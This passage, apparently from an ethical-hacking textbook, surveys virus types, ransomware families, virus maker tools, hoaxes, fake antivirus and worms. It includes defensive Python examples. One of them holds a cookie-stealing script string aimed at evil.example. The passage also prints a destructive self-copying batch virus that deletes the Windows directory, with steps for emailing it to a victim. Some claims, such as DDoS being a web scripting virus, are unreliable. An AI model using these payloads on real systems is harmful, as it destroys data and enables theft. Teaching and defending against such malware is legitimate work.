browser security through a website. This allows attackers to inject client-side scripting into the
web page. It can bypass access controls and steal information from the web browser. Web
scripting viruses are usually used to attack sites with large populations, such as sites for social
networking, user reviews, and email. Web scripting viruses can propagate slightly faster than
other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send
spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent
viruses attack you without your knowledge. In the case of a persistent virus, your cookies are
directly stolen, and the attacker can hijack your session, which allows the attacker to
impersonate you and cause severe damage.
• Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted
HTML inputs, enforcing cookie security, disabling scripts, and using scanning services
such as an antivirus program with real-time protection for your web browser. It is also
beneficial to avoid unknown websites and use Web of Trust to ensure that a site is
safe. You would notice if you are infected with a web scripting virus if your searches are
redirected elsewhere and the background or homepage changes. The computer runs slowly
and sluggishly, and programs may close randomly. Modern-day browsers have add-ons
such as Adblock Plus, which allow users to prevent scripts from being loaded.
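As an added illustration of the two points above (validating untrusted HTML input and enforcing cookie security), not from the original text, the following Python shows a review page that echoes a stored comment raw, the same page with HTML escaping, and a session cookie carrying the HttpOnly, Secure and SameSite flags that stop script from reading it. Standard library only; the review string and cookie value are constructed.

```python
"""Persistent web scripting: a stored review rendered into every visitor's page.
Vulnerable and hardened rendering side by side, plus a hardened session cookie."""
import html
from http.cookies import SimpleCookie

# Constructed example of a stored (persistent) review that carries script
# intended to read the visitor's cookies. It is data here, never executed.
STORED_REVIEW = ('<script>document.location="http://evil.example/?c="'
                 '+document.cookie</script>')


def render_review_vulnerable(review):
    """Builds the page by concatenation: whatever was stored becomes markup,
    so a <script> element in the review runs in every visitor's browser."""
    return f"<div class='review'>{review}</div>"


def render_review_safe(review):
    """Escapes <, >, &, ' and " before insertion into the HTML body, so the
    review is displayed as text and never parsed as an element."""
    return f"<div class='review'>{html.escape(review, quote=True)}</div>"


def contains_active_script(page):
    """Crude check: does a raw <script start tag survive in the output?"""
    return "<script" in page.lower()


def session_cookie_header(session_id, name="session"):
    """Set-Cookie value for the session.

    HttpOnly: document.cookie cannot read it, so the theft above yields nothing.
    Secure: sent over HTTPS only.  SameSite=Strict: not attached to requests
    initiated from another site."""
    jar = SimpleCookie()
    jar[name] = session_id
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Strict"
    jar[name]["path"] = "/"
    return jar[name].OutputString()


if __name__ == "__main__":
    print("vulnerable:", render_review_vulnerable(STORED_REVIEW))
    print("hardened:  ", render_review_safe(STORED_REVIEW))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```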
E-mail Viruses
An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated,
will result in some unexpected and usually harmful effects, such as destroying specific files on
your hard disk and causing the attachment to be emailed to everyone in your address book.
Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or
stealing personal data. Such viruses also vary in terms of how they are presented. For example,
a sender of an email virus may be unknown to a user, or a subject line may be filled with
nonsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a
trusted or known sender.
To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment
unless you know who sent it and what the attachment contains; in addition, you must install
and use antivirus software to scan any attachment before you open it.
Armored Viruses
Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to
prevent them from detecting the actual source of the infection. These viruses make it difficult
for antivirus programs to trace the actual source of the attack. They trick antivirus programs by
showing some other location even though they are actually on the system itself.
The following basic techniques are adopted by armored viruses:
• Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to
produce an incorrect program listing by disassembly analysis tools.
• Anti-debugging
Anti-debugging techniques are used to ensure that the program is not running under
the debugger. This can slow down the process of reverse engineering, but it cannot be
prevented.
• Anti-heuristics
Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on
the program's ability to protect itself from programmer and debugger intervention.
• Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the
emulated system environment; they can also secure intellectual property against
emulation-assisted reverse engineering.
• Anti-goat
Anti-goat techniques use heuristic rules to detect possible goat (bait) files; for example, the
virus will not infect a file that is too small or that contains a large number of do-nothing
instructions. Anti-goat viruses require more time for analysis.
Add-on Viruses
Add-on viruses append their code to the host code without making any changes to the latter or
relocate the host code to insert their code at the beginning.
Figure 7.48: Working of add-on virus (the virus code is appended to the Original Program, or the host code is relocated so the virus code sits at the beginning; a JUMP transfers control into the virus code and a JUMP returns to the host)

Intrusive Viruses
Intrusive viruses overwrite the host code completely or partly with the viral code.
Figure 7.49: Working of intrusive virus (the Original Program is shown before and after part of it is overwritten by the viral code)

Direct Action or Transient Viruses


Direct action or transient viruses transfer all control of the host code to where they reside in
memory. The virus selects the target program to be modified and corrupts it. The life of a transient
virus is directly proportional to the life of its host. Therefore, a transient virus executes only upon
the execution of its attached program and terminates upon the termination of its attached
program. At the time of execution, the virus may spread to other programs. This virus is
transient or direct, as it operates only for a short period and goes directly to the disk to search
for programs to infect.
Terminate and Stay Resident (TSR) Viruses
A terminate and stay resident (TSR) virus remains permanently in the target machine's memory
during an entire work session, even after the target host's program is executed and terminated.
The TSR virus remains in memory and therefore has some control over the processes. In
general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt
occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the
user needs to reboot the system to remove the virus without a trace.
The following steps are employed by TSR viruses to infect files:
• Gets control of the system
• Assigns a portion of memory for its code
• Transfers and activates itself in the allocated portion of memory
• Hooks the execution of code flow to itself
• Starts replicating to infect files
Ransomware
Ransomware is a type of malware that restricts access to the infected computer system or
critical files and documents stored on it, and then demands an online ransom payment to the
malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the
system's hard disk or merely lock the system and display messages meant to trick the user into
paying the ransom.
Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked
websites, infected programs, app downloads from untrusted sites, vulnerabilities in network
services, and so on. After execution, the payload in the ransomware runs and encrypts the
victim's data (files and documents), which can be decrypted only by the malware author. In
some cases, user interaction is restricted using a simple payload.
In a web browser, a text file or webpage displays the ransomware demands. The displayed
messages appear to be from companies or law enforcement personnel falsely claiming that the
victim's system is being used for illegal purposes or contains illegal content (e.g., porn videos,
pirated software), or it could be a Microsoft product activation notice falsely claiming that
installed Office software is fake and requires product re-activation. These messages entice
victims into paying money to undo the restrictions imposed on them. Ransomware leverages
victims' fear, trust, surprise, and embarrassment to get them to pay the ransom demanded.
Ransomware Families

Some additional ransomware families are as follows:


• Cerber
• CTB-Locker
• Sodinokibi
• BitPaymer
• CryptXXX
• CryptorBit
• Cryptolocker
• CryptoDefense
• CryptoWall
• Police-themed Ransomware
Examples of Ransomware

• Dharma

Dharma is a dreadful ransomware that was first identified in 2016; since then, it has
been affecting various targets across the globe with new versions. It has been regularly
updated with sophisticated mechanisms in recent years. At the end of March 2019,
Dharma struck a parking lot system in Canada. Previously, it also infected a Texas
hospital and some other organizations. The variants of this ransomware have the
following extensions: .adobe, .bip, .combo, .cezar, .ETH, .java. Its encrypted files have
new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption
algorithm to encrypt data and then displays ransom notes. These ransom notes are
named either Info.hta or FILES ENCRYPTED.txt. This ransomware spreads through
email campaigns. The ransom notes ask victims to contact the threat actors via the
provided email address and pay in bitcoins for the decryption service.
Figure 7.50: Screenshot displaying ransom demand message of Dharma ransomware (note headed "All your files have been encrypted!", instructing the victim to write to an e-mail address quoting an ID, offering free decryption of a few small files as a guarantee, explaining how to obtain bitcoins, and warning not to rename encrypted files or use third-party decryption software)

• eCh0raix
eCh0raix is a new ransomware that specifically targets Linux devices with QNAP
network-attached storage (NAS). It infects and encrypts the victim's machine using the
AES encryption technique. This malware was developed using the Go programming
language, and it has a very limited number of code lines, i.e., 400. Once the malware
infects the system, it communicates with its malicious command-and-control server via Tor
networks/SOCKS5 proxy servers and then initiates the encryption process.
Figure 7.51: Screenshot displaying ransom demand message of eCh0raix ransomware (status "Waiting Payment", a demand for 0.055 BTC to a bitcoin address shown as text and QR code, and a "Check payment and get decryptor" button)

• SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018.
It was first discovered in 2016; however, it was considered a grave ransomware after
the WannaCry attack due to its vast victim base in 2018. SamSam employs the RSA-2048
asymmetric encryption technique to encrypt the acquired local files in the infected
systems. Unlike other ransomware, this ransomware does not attack victims randomly.
This is a targeted ransomware, which specifically targets certain reputed companies. In
spite of knowing this, large multi-national companies were unable to defend themselves
from such attacks. The attack technique employed by this ransomware is also different
from that employed by other ransomware. Nearly all ransomware uses spam emails to
propagate and perform attacks; however, SamSam employs brute-force tactics against
weak passwords of the Remote Desktop Protocol (RDP).
Figure 7.52: Screenshot displaying ransom demand message of SamSam ransomware (the note explains that files were encrypted with a private key, directs the victim to a Tor site, lists where to buy bitcoins, and sets a deadline)


Some additional ransomware are as follows:
• WannaCry
• Petya - NotPetya
• GandCrab
• MegaCortex
• LockerGoga
• NamPoHyu
• Ryuk
• Cryptghost
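The Dharma description above gives two host-side indicators a defender can act on: ransom notes with fixed names (Info.hta, FILES ENCRYPTED.txt) and large numbers of files acquiring one of the listed variant extensions. The following Python is an added example, not from the original text; the threshold, the share listing and the assumption that a single renamed file is noise (".java" alone is common on a developer box) are the example's own.

```python
"""Mass-encryption indicators for a Dharma-style event, built from the note
names and extensions stated in the text. A single ransom note, or many files
gaining the same listed extension, is treated as reason to escalate."""
import os
from collections import Counter

# Ransom note file names given in the text (matched case-insensitively).
RANSOM_NOTE_NAMES = {"info.hta", "files encrypted.txt"}
# Variant and encrypted-file extensions given in the text. Several are
# ordinary on their own (.java), so they only count when many files share one.
DHARMA_EXTS = {".adobe", ".bip", ".combo", ".cezar", ".eth", ".java",
               ".xxxxx", ".like"}


def find_ransom_notes(paths):
    """Paths whose file name is one of the known ransom note names."""
    return [p for p in paths if os.path.basename(p).lower() in RANSOM_NOTE_NAMES]


def mass_rename_candidates(paths, threshold=20):
    """Listed extensions that appear on at least `threshold` files.

    Returns {ext: count}. The threshold is the example's own assumption; tune
    it to the share being watched so a few stray .java sources do not alert."""
    counts = Counter()
    for p in paths:
        ext = os.path.splitext(p)[1].lower()
        if ext in DHARMA_EXTS:
            counts[ext] += 1
    return {ext: n for ext, n in counts.items() if n >= threshold}


def assess(paths, threshold=20):
    """Combine the two signals; either one alone is enough to escalate."""
    notes = find_ransom_notes(paths)
    renames = mass_rename_candidates(paths, threshold)
    return {"notes": notes, "mass_renames": renames,
            "escalate": bool(notes or renames)}


# Constructed listing of a user share: 25 documents gained ".bip" and a note
# appeared, next to two ordinary files.
SAMPLE_SHARE = [f"/srv/share/report_{i}.docx.bip" for i in range(25)] + [
    "/srv/share/FILES ENCRYPTED.txt", "/srv/share/todo.txt", "/srv/share/Main.java"]

if __name__ == "__main__":
    print(assess(SAMPLE_SHARE))
```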
How to Infect Systems Using a Virus


Attackers can infect systems using a virus in the following steps:
• Creating Virus
• Propagating and Deploying Virus
Creating a Virus
A virus can be created in two ways: writing a virus program, and using virus maker tools.
• Writing a Simple Virus Program
The following steps are involved in writing a simple virus program:
1. Create a batch file Game.bat with the following text:
@echo off
for %%f in (*.bat) do copy %%f + Game.bat
del c:\Windows\*.*
2. Convert the Game.bat batch file into Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to the victim
4. When Game.com is executed by the victim, it copies itself to all the .bat files in the
current directory on the target machine and deletes all the files in the Windows
directory
• Using Virus Maker Tools
Virus maker tools allow you to customize and craft your virus into a single executable
file. The nature of the virus depends on the options available in the virus maker tool.
Once the virus file is built and executed, it can perform the following tasks:
o Disable Windows command prompt and Windows Task Manager
o Shut down the system
o Infect all executable files
o Inject itself into the Windows registry and start up with Windows
o Perform non-malicious activity such as unusual mouse and keyboard actions
The following tools are useful for testing the security of your own antivirus software.
o DELmE's Batch Virus Maker
DELmE's Batch Virus Generator is a virus creation program with many options to
infect the victim's PC, such as formatting the C: drive, deleting all the files in the hard
disk drive, disabling admin privileges, cleaning the registry, changing the home page,
killing tasks, and disabling/removing the antivirus and firewall.
Figure 7.53: Screenshot of DELmE's Batch Virus Maker (options panels for file-type infection such as Infect All .Exe Files, Infect All .Doc Files and Infect File Type; Internet spreading via "Send To Contacts" on Microsoft Outlook as a mail attachment; About dialog: version 2.0, coded by DELmE)

o JPS Virus Maker


JPS Virus Maker tool is used to create customized viruses. It has many in-built
options to create a virus. Some of the features of this tool are auto-startup, disable
task manager, disable control panel, enable remote desktop, turn off Windows
Defender, etc.
Figure 7.54: Working of JPS Virus Maker

Some additional virus maker tools are as follows:
• Bhavesh Virus Maker SKW
• Deadly Virus Maker
• SonicBat Batch Virus Maker
• TeraBIT Virus Maker
• AndreinickOS's Batch Virus Maker
Propagating and Deploying a Virus


After creating viruses, attackers can adopt various virus propagation and deployment
techniques to transfer the virus to the victim's machine. Some of these techniques are as
follows:

• Virus Hoaxes
• Fake Antivirus
Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to
introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of loss of productivity and
bandwidth while naive users react to them and forward them to other users. Because viruses
tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes
are false alarms claiming reports of nonexistent viruses.
The following are some critical features of virus hoaxes:
• These warning messages, which can be rapidly propagated, state that a particular e-mail
message should not be opened, and that doing so would damage one's system.
• In some cases, these warning messages themselves contain virus attachments.
Try to crosscheck the identity of the person who has posted the warning.
It is a good practice to look for technical details in any message concerning viruses.
Furthermore, search for information on the Internet to learn more about hoaxes, especially by
scanning bulletin boards on which people actively discuss current community
happenings/concerns. Before jumping to conclusions by reading Internet information, first,
check the following:
• If the information is posted by newsgroups that are suspicious, cross-check the
information with another source.
• If the person who has posted the news is not an expert or a known person in the
community, crosscheck the information with another source.
• If a government body has posted the news, the posting should also have a reference to
the corresponding federal regulation.
• One of the most effective checks is to look up the suspected hoax virus by name on
antivirus software vendor sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched, in which threat actors spread Google Critical
Security Alert messages to victims. Google Critical Security Alert is a service provided by Google
to notify its users regarding any activity related to their accounts. The activities can include
logging in, changing passwords, changing personal information, etc. Attackers create and send
fake alert emails to victims, thereby notifying them that the aforementioned activities have
taken place. By looking at the critical alert email, the user clicks the link provided in the email
and subsequently gets infected. The figure below describes a hoax email stating "New device
signed in to." By looking at this email without noting the email source, the victim clicks the
"CHECK ACTIVITY" button and gets trapped.
Figure 7.55: Screenshot of Google Critical Security Alert Scam (hoax email headed "New device signed in to", reading "Your Google Account was just signed in to from a new Windows device. You're getting this email to make sure that it was you.", with a "CHECK ACTIVITY" button and a footer imitating Google's address)

Some additional virus hoaxes are as follows:


• AppleCare
• Bangkok 8.5 Earthquake Video
• Chrome critical error
• Compromising video
Fake AntiVirus
Fake or rogue antivirus software is a form of Internet fraud based on malware. It appears and
performs similarly to a real antivirus program. Fake antivirus software is often displayed in
banner ads, pop-ups, email links, and search engine results when searching for antivirus
software. A well-designed fake antivirus software looks authentic and often encourages users
to install it on their systems, perform updates, or remove viruses and other malicious programs.

Upon clicking the ad, pop-up, or link to install the antivirus software, users are redirected to
another page where they are prompted to buy or subscribe to that antivirus software by
entering their payment details. Fake antivirus software can cause severe damage to systems
once downloaded and installed; e.g., it infects systems with malicious software, steals
sensitive information (e.g., passwords, bank account numbers, credit card data), and corrupts
files.
Ethical Hacking and Countermeasures
Malware Threats

At present, a new fake antivirus trend has emerged. Fake antivirus tools are rapidly
proliferating in the mobile application space. According to AV-Comparatives research, two-thirds
of all antivirus applications present in the Android Play Store are fake.
• Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It claims to eliminate
viruses and other malware from mobile devices. However, when the application itself is
scanned, it is flagged as a Medium Risk, as shown in the screenshot below.
[Figure: Google Play listing for "Free Antivirus 2019 - Scan & Clean Virus", with the scan result "Ads Displayed: Displays ads while in use. The ads are common in free apps."]

Figure 7.56: Screenshot of AntiVirus Pro 2017 Fake AntiVirus

Some additional fake antivirus programs are as follows:
• AntiVirus Pro 2017
• PCSecureSystem
• Antivirus 10
• TotalAV

Computer Worms

• Computer worms are malicious programs that independently replicate, execute, and spread across network connections, thus consuming available computing resources without human interaction
• Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates a botnet; these botnets can be used to perform further cyber attacks
• Worms: Monero, Bondat, Beapy

How is a Worm Different from a Virus?
• A Worm Replicates on its own: A worm is a special type of malware that can replicate itself and use memory but cannot attach itself to other programs
• A Worm Spreads through the Infected Network: A worm takes advantage of file or information transport features on computer systems and automatically spreads through the infected network, but a virus does not
Computer Worms

Computer worms are standalone malicious programs that replicate, execute, and spread across
network connections independently, without human intervention. Intruders design most worms
to replicate and spread across a network, thus consuming available computing resources and, in
turn, causing network servers, web servers, and individual computer systems to become
overloaded and stop responding. However, some worms also carry a payload to damage the
host system.
Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some
cases, the worm's host machine is also infected. Initially, black hat professionals treated worms
as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on
and targeted Windows OS using the same worms by sharing them via e-mail, IRC, and other
network functions.
Attackers use worm payloads to install backdoors on infected computers, which turns them
into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some
of the latest computer worms are as follows:
• Monero
• Bondat
• Beapy

How is a Worm Different from a Virus?

Virus: A virus infects a system by inserting itself into a file or executable program.
Worm: A worm infects a system by exploiting a vulnerability in an OS or application by replicating itself.

Virus: It might delete or alter the content of files or change the location of files in the system.
Worm: Typically, a worm does not modify any stored programs; it only exploits the CPU and memory.

Virus: It alters the way a computer system operates without the knowledge or consent of a user.
Worm: It consumes network bandwidth, system memory, etc., excessively overloading servers and computer systems.

Virus: A virus cannot spread to other computers unless an infected file is replicated and sent to the other computers.
Worm: A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system.

Virus: A virus spreads at a uniform rate, as programmed.
Worm: A worm spreads more rapidly than a virus.

Virus: Viruses are difficult to remove from infected machines.
Worm: Compared with a virus, a worm can be removed easily from a system.

Table 7.4: Difference between virus and worm
